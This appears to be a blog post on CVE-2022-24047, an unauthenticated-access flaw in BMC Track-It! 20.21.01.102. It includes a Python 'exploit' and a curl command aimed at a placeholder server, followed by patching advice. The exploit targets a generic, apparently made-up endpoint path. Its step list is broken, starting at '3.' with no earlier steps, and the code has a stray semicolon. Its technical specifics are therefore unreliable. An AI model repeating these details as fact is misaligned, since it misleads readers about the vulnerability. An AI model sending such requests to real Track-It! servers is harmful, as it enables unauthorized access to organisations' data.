CVE-2022-24047 - Unauthenticated Access in BMC Track-It! 20.21.01.102 - Exploit Details and Code Examples

In 2022, a critical vulnerability exploitable over the network—CVE-2022-24047—was found in BMC Track-It! version 20.21.01.102. This flaw, first reported as ZDI-CAN-14618 by Trend Micro’s Zero Day Initiative, allows anyone on the internet to bypass authentication and gain unauthorized access to the system, potentially exposing sensitive information or allowing attackers to execute further attacks.

Version Affected: 20.21.01.102 (other versions may also be at risk)

- CVE Page: NVD entry: CVE-2022-24047
- Original Advisory: ZDI-22-320

Core Problem

The authorization implementation of certain HTTP endpoints in Track-It! fails to check for user authentication. This lets anyone, no matter if they’re logged in or not, access sensitive internal functionality.

This is a classic example of a high-impact vulnerability, since

- No authentication is required: Attackers just need a network connection to the Track-It! service.

The Attack

An attacker sends an HTTP request to a vulnerable Track-It! server. Because there are missing checks, the server answers as if the attacker is a fully authenticated user.

Determine the vulnerable endpoint (from advisories and reverse engineering)

3. Send a crafted HTTP request (no tokens/cookies/session ids)

Sample Exploit Code

Below is a basic example exploit in Python. This one tries to access a sensitive endpoint without providing any authentication.

import requests

# Set this to your target Track-It! server
TARGET_URL = "http://trackit.company.com/TrackItServices/secureendpoint";

# No auth headers/tokens required!
resp = requests.get(TARGET_URL)

if resp.status_code == 200:
    # Successfully bypassed authentication
    print("Exploit successful! Here's the response:")
    print(resp.text)
else:
    print(f"Failed to bypass authentication. Status: {resp.status_code}")

Note: The actual endpoint to attack might vary depending on your Track-It! deployment and function you want to abuse. For detail, see the ZDI or NVD advisories.

Just a simple browser or cURL call—no login required

curl http://trackit.company.com/TrackItServices/secureendpoint

If the vulnerability is present, you’ll receive the same data as a legitimate user.

What About Patches and Mitigation?

- BMC released fixes. If you operate Track-It!, upgrade immediately to the latest version. See their official security advisory.
- Network controls: Restrict access to the Track-It! service so only internal and necessary users can reach it.
- Monitor access logs for suspicious requests (especially to endpoints that should require authentication).

Additional Resources

- Zero Day Initiative Disclosure: ZDI-22-320
- NVD CVE-2022-24047 Page
- BMC Security Advisory - Track-It!
- Track-It! Product Info

Summary

CVE-2022-24047 is a severe but easy-to-exploit vulnerability in BMC Track-It! 20.21.01.102. Anyone can exploit it over the network, without a password, simply by sending HTTP requests to affected endpoints. If you have a vulnerable installation, patch as soon as possible and limit public network access.

If you found this post helpful, consider sharing it with your IT team—or your company’s sysadmin! Stay safe and always keep your software up to date.


*This article is exclusive and crafted in easy-to-understand American language, providing direct insight into the vulnerability, how it works, and how to protect yourself. For more technical deep dives, follow the linked resources above.*

Timeline

Published on: 02/18/2022 20:15:00 UTC
Last modified on: 03/01/2022 02:05:00 UTC